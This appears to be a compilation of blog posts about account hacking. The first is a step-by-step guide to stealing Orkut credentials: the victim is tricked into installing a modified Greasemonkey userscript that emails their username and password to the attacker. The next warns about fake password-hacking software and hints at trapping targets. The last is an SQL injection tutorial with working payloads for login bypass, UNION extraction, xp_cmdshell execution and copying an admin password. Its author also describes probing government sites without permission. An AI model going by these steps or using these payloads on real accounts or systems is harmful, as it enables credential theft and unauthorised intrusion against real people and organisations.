Hacking Orkut using Greasemonkey

1) First of all, your victim MUST HAVE FIREFOX WITH GREASEMONKEY.
Download firefox at:- http://www.firefox.com
Download greasemonkey at:- https://addons.mozilla.org/en-US/firefox/addon/7482)
Now, go to http://www.trickplanet.com/orkut/hack.php
Download the file "multiple.user.js"
Now open it with NOTEPAD. Search for the code action=""; and replace it with action=your_email_address@yourdomain.com;
Save the file with the name multiple.user.js and upload it on googlepages or 110mb or any other free subdomain or your own domain.
e.g. http://[YOUR DOMAIN NAME]/multiple.user.js3)
3) Now make your victim install this file. He will be able to install it IF AND ONLY IF he has FIREFOX WITH GREASEMONKEY.
Once your victim installs this file, you are done ! .
4) Now the next time he opens orkut and logs in to orkut, his username and password will be emailed to you at the email ID you provided in step 2.Enjoy ! ;)
Do not misuse ! :)
Happy Hacking !

Please read this post entirely before asking for virtual software for hacking passwords!

If you ever read something like below on any webpage typically blog, forum & orkut community or get a mail like…Hey guys,I have software to hack yahoo, gmail, hotmail, etc. passwords. If you are interested then give me your email id’s and I will email you that!Ever wondered about truth?? Is it so simple?Yes… but for spammers! Still you can put your email id’s below (may be in comment section) and help me to get some money by selling them to spammers! Yep, its that much simple for spammers!
So do you still think the person sending you this mail have such kind of software and just did not respond to your email!Do you still think such software exists that will ask for your targets email id and just after one click will show his/her password!?!
In reality even if you physically brake into yahoo, gmail or any genuine service’s database, you will at the most get a garbage encrypted string. All famous services use one-way encryption for storing password in encrypted form. That means you can not get original password from this encrypted string!
Still if you are confused whether to trust me or spammers then as my last attempt to save you from spammer recall last time when you forgot your password. After going through verification steps did you get your password back or a chance to set a new password? In my experience with Yahoo at least I got a new random password by them which I can change to something comfortable string later-on if I wish!
So why did not they give me my original password? There are many reasons and as I told u earlier that they don’t store original password is one of those reasons!
So does this means you can not break into someones account?Yeah you can, but it depends on your targets foolishness rather than your geekness. There are many tricks to do this, even some of them I tried successfully!
As this post getting long I may share those trick next time!
Till then have this hint : Don’t target the server, instead set up trap for your target! Servers are genius, targets may not be!!!

What is SQL Injection ? Why So Dangerous ?

A friend of mine at College was asking me this.SQL injection is the most common and videly used exploit by hackers all over the world...few days back i was just doing some SQL injection test on Indian govt sites, I was shocked to see how many imp govt sites r open to it....this is a big thread for us...a malicious hacker can do a lot of harm if he wish to.Vocabulary:* SQL: Server Query Language-used in web applications to interact with databases.* SQL Injection: Method of exploiting a web application by supplying user input designed to manipulate SQL database queries.* "Injection": You enter the injections into an html form which is sent to the web application. The application then puts you input directly into a SQL query. In advertantly, this allows you to manipulate to query...Prerequisite:* A background of programming and a general idea of how most hacking methods are done.

Application:* Hacking a SQL database-driven server (usually only the ones that use unparsed user input in database queries). There is still a surprising number of data-driven web applications on the net that are vulnerable to this type of exploit. Being as typical as all method, the frequency of possible targets decreases over time as the method becomes more known. This is one those exploits that aren't easily prevented by a simple patch but by a competent programmer.Use:First, let's look at a typical SQL query:SELECT fieldName1, fieldName2 FROM databaseName WHERE restrictionsToFilterWhichEntriesToReturnNow, to dissect...The red areas is where criterion is inputed. The rest of the query structures the query.* SELECT fieldName1, fieldName2 - Specifies the of the names of fields that will be returned from the database.* FROM databaseName - Specifies the name of the database to search.* WHERE restrictionsToFilterWhichEntriesToReturn - Specifies which entries to return.Here is an example for somebody's login script:SELECT userAcessFlags FROM userDatabase WHERE userName="(input here)" AND userPass="(input here)"The idea is guess what that application's query looks like and input things designed to return data other than what was intended.In the example, input like the following could give gain access to the administrator account:User: administratorPass: " OR ""="Making the query like this:SELECT userAcessFlags FROM userDatabase WHERE userName="administrator" AND userPass="" OR ""=""As you can see, ""="" (nothing does indeed match nothing)Note: Injections are rarely as simple as this...One can be creative and use error messages to your advantadge to access other databases, fields, and entries. Learn a little SQL to use things like UNION to merges query results with ones not intended.On the security side, parse user data and get rid of any extra symbols now that you know how it's done.The idea in this example is to break out of the quotation marks.When stuff is inside quotation marks, the stuff isn't processed as code or anything but as a phrase and what it is.The password injection was: " OR ""="What this does is close the string that was started by the quotation mark in the part userPass=". Once you break out, THEN stuff is considered code. So, I put OR ""=" after I break out of the string. You will notice that it is comparing two quotation marks with one, but the quotation mark already built in by the application finishes it so we have this:userPass="" OR ""=""Notice how the first and last quotation marks are not colored and are not built in.Additional notes:This was just an extremely simplified version and you will probably need to learn a little SQL to fully understand.Here are a few SQL terms that do other things:UNION: You use this to merge the results of one query with another. You may put things like SELECT after UNION in order to search other databases and stuff. Sometimes you may need to use ALL in conjuction to break out of certain clauses. It does no harm so when in doubt you could do something like:" UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE userName="adminThe key when using UNION is to make your new query return the same amount of columns in the same datatype so that you may get the results you want.:-- This works sometimes to terminate the query so that it ignores to the rest of the stuff that might be fed afterwards if you don't like it. For example:SELECT * FROM userDatabase WHERE userName="admin";--" AND userPass="aH0qcQOVz7e0s"NOT IN: If you have no idea which record you want you could record cycle (you request vague info, and you put what you already got in the NOT IN clause so that you can get the next entry)Usage:SELECT userName userPass FROM userDatabase WHERE userName NOT IN ('Dehstil','Twistedchaos')EXEC: This command should never work, but if it does...you win; you could do anything. For instance, you could inject something like this:';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:All my examples so far have dealt with read processes. To manipulate a write process, here is an example for those who know what their doing:INSERT INTO userProfile VALUES(''+(SELECT userPass FROM userDatabase WHERE userName='admin')+'' + 'Chicago' + 'male')This example would theoretically put the admin's password in your profile.